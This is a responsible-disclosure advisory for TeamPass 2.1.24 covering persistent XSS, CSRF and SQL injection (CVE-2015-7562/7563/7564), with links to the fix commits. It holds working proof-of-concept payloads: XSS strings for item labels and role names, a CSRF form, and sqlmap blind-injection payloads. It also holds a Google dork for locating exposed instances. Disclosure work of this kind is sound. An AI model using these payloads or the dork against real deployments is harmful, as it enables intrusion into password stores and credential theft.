TeamPass 2.1.24 - Multiple Vulnerabilities





Platform:

PHP

Date:

2016-03-14


Affected Product:    TeamPass
Vulnerability Type:  	Multiple XSS,CSRF, SQL injections
Fixed in Version:	2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)
Vendor Website:      	http://www.teampass.net
Software Link: : 	https://github.com/nilsteampassnet/TeamPass
Affected Version:	2.1.24 and prior 
Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4
Google Dork: intitle:"Teampass" + inurl:index.php?page=items
Tested on: Ubuntu
Remote Exploitable:  Yes
Reported to vendor:  30 december 2015
Disclosed to public: 14 March 2016
Release mode:        Responsible Disclosure
CVE-2015-7562 TeamPass 2.1.24 Persistant XSS 
CVE-2015-7563 TeamPass 2.1.24 CSRF 
CVE-2015-7564 TeamPass 2.1.24 SQL Injection 
Credits:              Vincent Malguy


Description :
TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. 
Copyright (c) 2009-2015, Nils Laumaillé

********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS  *********************
When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficiently  prevent XSS.
POC of a persistant XSS : add  item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";
This xss will be trigger each time a user click on this item. 
As item can be share, there is a way for a user to trick an admin to trigger this xss.
fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

POC of a persistant XSS : 
Add a new role with name  : <script>alert("XSS");</script> 
This xss will be trigger in many admin pages
Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)

********************* CVE-2015-7563 TeamPass 2.1.24 CSRF  *********************
Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :

<form action="http://<teampass host>/sources/main.queries.php" method="post">
    <select name="type">
    <option value="increase_session_time »>will add 1 hour timeout to the user session</option>
</select>
    <input type=submit>
  </form> 
  
recommanded fix: add anti-CSRF token.

********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections   *********************
SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.
Sqlmap output  :
---
Parameter: id (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1
 —
 fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)


SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .
Note that direction need to be prefixed by ", "  in order to be exploitable
Sqlmap output  for connections_logs:
---
Parameter: order (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC
—

---
Parameter: direction (POST)
   Type: boolean-based blind
   Title: MySQL >= 5.0 boolean-based blind - Parameter replace
   Payload: type=errors_logs&order=date&direction=,  (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
—
fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)